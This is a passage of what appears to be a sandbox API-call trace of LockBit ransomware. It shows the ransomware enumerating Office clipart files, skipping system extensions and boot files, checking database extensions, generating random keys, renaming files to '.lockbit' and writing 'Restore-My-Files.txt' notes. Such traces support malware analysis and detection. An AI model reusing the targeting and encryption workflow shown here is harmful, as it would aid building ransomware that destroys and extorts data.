"c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00792_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.593] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.593] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.593] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12252) returned 1 [0177.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.594] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.594] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.595] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.595] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.595] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.600] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00792_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00792_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.600] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.600] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.601] free (_Block=0x1fa2ed8) [0177.601] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00792_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.601] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.601] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.601] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c77a00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aca0270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79c77a00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2764, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY00795_.WMF", cAlternateFileName="")) returned 1 [0177.601] lstrcmpiW (lpString1=".", lpString2="SY00795_.WMF") returned -1 [0177.601] lstrcmpiW (lpString1="..", lpString2="SY00795_.WMF") returned -1 [0177.601] PathFindExtensionW (pszPath="SY00795_.WMF") returned=".WMF" [0177.601] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.601] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.602] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.603] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.603] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY00795_.WMF") returned -1 [0177.603] lstrcmpiW (lpString1="ntldr", lpString2="SY00795_.WMF") returned -1 [0177.603] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY00795_.WMF") returned -1 [0177.603] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY00795_.WMF") returned -1 [0177.603] lstrcmpiW (lpString1="autorun.inf", lpString2="SY00795_.WMF") returned -1 [0177.603] lstrcmpiW (lpString1="thumbs.db", lpString2="SY00795_.WMF") returned 1 [0177.604] lstrcmpiW (lpString1="iconcache.db", lpString2="SY00795_.WMF") returned -1 [0177.604] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.604] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00795_.WMF") returned=".WMF" [0177.604] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.604] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.604] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.605] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.605] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.605] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.605] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.605] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.605] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.605] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.605] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00795_.WMF.lockbit") returned 72 [0177.605] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00795_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00795_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0177.606] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.606] malloc (_Size=0x40068) returned 0x3e70008 [0177.606] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=10084) returned 1 [0177.606] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.607] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0177.607] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.607] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0177.607] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0177.614] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00795_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00795_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.614] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.614] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.616] free (_Block=0x1fa2ed8) [0177.616] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00795_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.616] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.616] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.616] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5ec100, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5aca0270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb5ec100, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x9b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY00882_.WMF", cAlternateFileName="")) returned 1 [0177.616] lstrcmpiW (lpString1=".", lpString2="SY00882_.WMF") returned -1 [0177.616] lstrcmpiW (lpString1="..", lpString2="SY00882_.WMF") returned -1 [0177.616] PathFindExtensionW (pszPath="SY00882_.WMF") returned=".WMF" [0177.616] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.616] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.616] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.616] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.616] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.616] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.616] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.616] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.616] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.616] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.616] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.617] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.617] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.618] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.618] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.618] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.618] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.618] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.618] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.618] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.618] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.618] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.618] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.618] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.618] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY00882_.WMF") returned -1 [0177.618] lstrcmpiW (lpString1="ntldr", lpString2="SY00882_.WMF") returned -1 [0177.618] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY00882_.WMF") returned -1 [0177.618] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY00882_.WMF") returned -1 [0177.618] lstrcmpiW (lpString1="autorun.inf", lpString2="SY00882_.WMF") returned -1 [0177.618] lstrcmpiW (lpString1="thumbs.db", lpString2="SY00882_.WMF") returned 1 [0177.618] lstrcmpiW (lpString1="iconcache.db", lpString2="SY00882_.WMF") returned -1 [0177.618] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.618] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00882_.WMF") returned=".WMF" [0177.618] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.618] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.618] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.618] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.619] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.619] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00882_.WMF.lockbit") returned 72 [0177.620] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00882_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00882_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.625] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.625] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.625] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2480) returned 1 [0177.625] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.625] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.625] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.625] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.626] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.642] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00882_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00882_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.642] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.643] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.645] free (_Block=0x1fa2ed8) [0177.645] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00882_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.645] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.645] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.645] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c77a00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aca0270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79c77a00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY01006_.WMF", cAlternateFileName="")) returned 1 [0177.646] lstrcmpiW (lpString1=".", lpString2="SY01006_.WMF") returned -1 [0177.646] lstrcmpiW (lpString1="..", lpString2="SY01006_.WMF") returned -1 [0177.646] PathFindExtensionW (pszPath="SY01006_.WMF") returned=".WMF" [0177.646] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.646] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.647] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW 